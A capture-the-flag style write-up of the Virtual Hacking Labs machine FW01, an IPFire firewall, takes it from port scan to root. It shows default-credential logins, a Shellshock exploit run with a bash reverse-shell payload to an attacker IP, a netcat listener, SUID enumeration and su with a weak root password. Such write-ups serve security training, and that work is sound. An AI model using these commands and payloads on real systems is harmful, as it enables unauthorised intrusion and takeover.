WriteupsVHL — FW01
MiscMediumLinux
VHL — FW01
IPFire firewall appliance with DNSmasq on port 53. Default/weak credentials on the admin panel lead to command execution.
February 16, 2025Virtual Hacking Labs
#IPFire#Firewall#DNSmasq#Default Creds
nmap
sh
nmap -sC -sV -T4 -A -Pn -p- --open 10.11.1.200
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-16 14:53 EST
Stats: 0:01:12 elapsed; 0 hosts completed (1 up), 1 undergoing SYN Stealth Scan
SYN Stealth Scan Timing: About 74.79% done; ETC: 14:55 (0:00:25 remaining)
Nmap scan report for 10.11.1.200
Host is up (0.022s latency).
Not shown: 65532 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
53/tcp open domain dnsmasq 2.71
| dns-nsid:
|_ bind.version: dnsmasq-2.71
81/tcp open http Apache httpd 2.2.27 ((Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27)
| http-title: 401 Authorization Required
|_Requested resource was /cgi-bin/index.cgi
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_ Basic realm=IPFire - Restricted
|_http-server-header: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27
444/tcp open ssl/http Apache httpd 2.2.27 ((Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27)
| http-title: 400 Bad Request
|_Requested resource was /cgi-bin/index.cgi
| ssl-cert: Subject: commonName=fw01.localdomain
| Not valid before: 2016-12-07T15:50:11
|_Not valid after: 2032-10-18T06:24:51
|_http-server-header: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27
|_ssl-date: TLS randomness does not represent time
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|firewall
Running (JUST GUESSING): Linux 3.X|2.6.X|4.X (97%), WatchGuard Fireware 11.X (88%)
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:4 cpe:/o:watchguard:fireware:11.8
Aggressive OS guesses: Linux 3.2 - 3.8 (97%), Linux 2.6.32 - 3.0 (92%), Linux 2.6.32 (91%), Linux 3.2 (91%), Linux 3.2 - 3.16 (91%), Linux 2.6.32 - 3.10 (90%), Linux 2.6.32 - 3.13 (90%), Linux 3.11 - 4.1 (90%), Linux 3.8 (88%), WatchGuard Fireware 11.8 (88%)
No exact OS matches for host (test conditions non-ideal).
TRACEROUTE
HOP RTT ADDRESS
1 22.45 ms 10.11.1.200
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.02 seconds
81
sh
81/tcp open http Apache httpd 2.2.27 ((Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27)
| http-title: 401 Authorization Required
|_Requested resource was /cgi-bin/index.cgi
| http-auth:
| HTTP/1.1 401 Authorization Required\x0D
|_ Basic realm=IPFire - Restricted
|_http-server-header: Apache/2.2.27 (Unix) mod_ssl/2.2.27 OpenSSL/1.0.1i PHP/5.3.27default credentials
admin:admin > redirect to https
IPFire-2.15-Shellshock-Exploit
- https://github.com/heartburn-dev/IPFire-2.15-Shellshock-Exploit
sh
python3 SIPS.py 10.11.1.200 444 /cgi-bin/index.cgi admin admin 'bash -i >& /dev/tcp/172.16.1.1/1234 0>&1'
________________________ ________
__ ___/____ _/___ __ \__ ___/
________ _____ \ __ / __ /_/ /_____ \ ________
_/_____/ ____/ / __/ / _ ____/ ____/ / _/_____/
/____/ /___/ /_/ /____/
[*] [S]kunk's [IP]Fire [S]hellshock - By 0xSkunk
[*] For use with Python3 - Effective against IPFire <= 2.15 Core Update 82
[*] Example Usage: python3 SIPS.py 69.69.13.37 444 /cgi-bin/index.cgi admin p@ssw0rd 'bash -i >& /dev/tcp/12.34.56.78/4444 0>&1'
[*] Valid IP Address...
[*] Port is an integer...
[*] Directory correctly prefixed with /...
[*] Is the target using (1) HTTP or (2) HTTPS: 2
2
[*] Attempting to deliver payload: bash -i >& /dev/tcp/172.16.1.1/1234 0>&1sh
nc -lnvp 1234
listening on [any] 1234 ...
connect to [172.16.1.1] from (UNKNOWN) [10.11.1.200] 38946
bash: no job control in this shell
bash-3.2$ whoami
whoami
nobodysh
python -c 'import pty; pty.spawn("/bin/bash")'priv esc
sh
bash-3.2$ uname -a
uname -a
Linux fw01 3.10.44-ipfire #1 SMP Tue Sep 9 18:11:30 GMT 2014 i686 pentium2 i386 GNU/Linux
bash-3.2$ cat /etc/os-releasesh
╔══════════╣ SUID - Check easy privesc, exploits and write perms
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
strings Not Found
strace Not Found
-rwsr-x--- 1 root nobody 8.7K Sep 9 2014 /usr/local/bin/rebuildroutes (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 10K Sep 9 2014 /usr/local/bin/logwatch (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/dhcpctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.8K Sep 9 2014 /usr/local/bin/getconntracktable (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/launch-ether-wake (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 16K Sep 9 2014 /usr/local/bin/wirelessctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.7K Sep 9 2014 /usr/local/bin/firewallctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 12K Sep 9 2014 /usr/local/bin/setaliases (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 6.8K Sep 9 2014 /usr/local/bin/urlfilterctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.2K Sep 9 2014 /usr/local/bin/backupctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.9K Sep 9 2014 /usr/local/bin/dnsmasqctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.1K Sep 9 2014 /usr/local/bin/snortctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 6.8K Sep 9 2014 /usr/local/bin/updxlratorctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/upnpctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 11K Sep 9 2014 /usr/local/bin/addonctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.1K Sep 9 2014 /usr/local/bin/redctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.0K Sep 9 2014 /usr/local/bin/pakfire (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 29K Sep 9 2014 /usr/local/bin/openvpnctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/timectrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.1K Sep 9 2014 /usr/local/bin/smartctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 15K Sep 9 2014 /usr/local/bin/ipsecctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 12K Sep 9 2014 /usr/local/bin/rebuildhosts (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.0K Sep 9 2014 /usr/local/bin/getipstat (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 12K Sep 9 2014 /usr/local/bin/sshctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.9K Sep 9 2014 /usr/local/bin/extrahdctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 12K Sep 9 2014 /usr/local/bin/syslogdctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/qosctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 9.8K Sep 9 2014 /usr/local/bin/squidctrl (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 7.5K Sep 9 2014 /usr/local/bin/ipfirereboot (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.8K Sep 9 2014 /usr/local/bin/wirelessclient (Unknown SUID binary!)
-rwsr-x--- 1 root nobody 8.6K Sep 9 2014 /usr/local/bin/fireinfoctrl (Unknown SUID binary!)
-rws--x--x 1 root root 550K Sep 9 2014 /usr/lib/openssh/ssh-keysign
-r-sr-x--- 1 root root 24K Sep 9 2014 /usr/lib/pppd/2.4.7/rp-pppoe.so (Unknown SUID binary!)
-r-sr-x--- 1 root root 20K Sep 9 2014 /usr/lib/pppd/2.4.7/pppoatm.so (Unknown SUID binary!)
-rwsr-xr-x 1 root root 375K Sep 9 2014 /usr/bin/screen-4.0.3 (Unknown SUID binary!)
-rwsr-xr-x 1 root root 166K Sep 9 2014 /usr/bin/sudo ---> check_if_the_sudo_version_is_vulnerable
-rwsr-xr-x 1 root root 1.1M Sep 9 2014 /usr/bin/gpg
-rwsr-xr-x 1 root root 28K Sep 9 2014 /usr/bin/fusermount
-rwsr-x--- 1 root nobody 103K Sep 9 2014 /usr/bin/lsof (Unknown SUID binary!)
-rwsr-xr-x 1 root root 36K Sep 9 2014 /usr/bin/ping
-rwsr-xr-x 1 root root 33K Sep 9 2014 /lib/security/unix_chkpwd
-rwsr-xr-x 1 root root 29K Sep 9 2014 /bin/su
-rwsr-xr-x 1 root root 23K Sep 9 2014 /bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
-rwsr-xr-x 1 root root 23K Sep 9 2014 /bin/umount ---> BSD/Linux(08-1996)
-rwsr-xr-x 1 root root 34K Sep 9 2014 /bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
╔══════════╣ SGID
╚ https://book.hacktricks.xyz/linux-hardening/privilege-escalation#sudo-and-suid
-rwxr-sr-x 1 root tty 23K Sep 9 2014 /usr/bin/wall
---x--s--x 1 cron cron 59K Sep 9 2014 /usr/bin/fcrontab (Unknown SGID binary)sh
╔══════════╣ Unexpected in /opt (usually empty)
total 12
drwxr-xr-x 3 root root 4096 Sep 9 2014 .
drwxr-xr-x 21 root root 4096 Dec 7 2016 ..
drwxr-xr-x 6 root root 4096 Sep 9 2014 pakfire
╔══════════╣ Unexpected in root
/.rndweak root credential
root:root
sh
bash-3.2$ su root
su root
Password: root
[root@fw01 /]# whoami
whoami
root
[root@fw01 /]# cat /root/key.txt
cat /root/key.txt
z2pap8s3f7jqeg59cb6f
Up next
MediumFeb 2025
VHL — Graphs01
Cacti network monitoring on Ubuntu. Exploited CVE-2022-46169 unauthenticated RCE in Cacti for initial shell access.
Read writeup
MediumFeb 2025
VHL — Mon02
Centreon IT monitoring platform on Red Hat. Default credentials lead to authenticated RCE via malicious poller command injection.
Read writeup
MediumFeb 2025
VHL — Websrv01
Food Magazine site on Ubuntu with Exim 4.91 SMTP. Exploited CVE-2019-10149 Exim privilege escalation (GHOSTCAT) for root.
Read writeup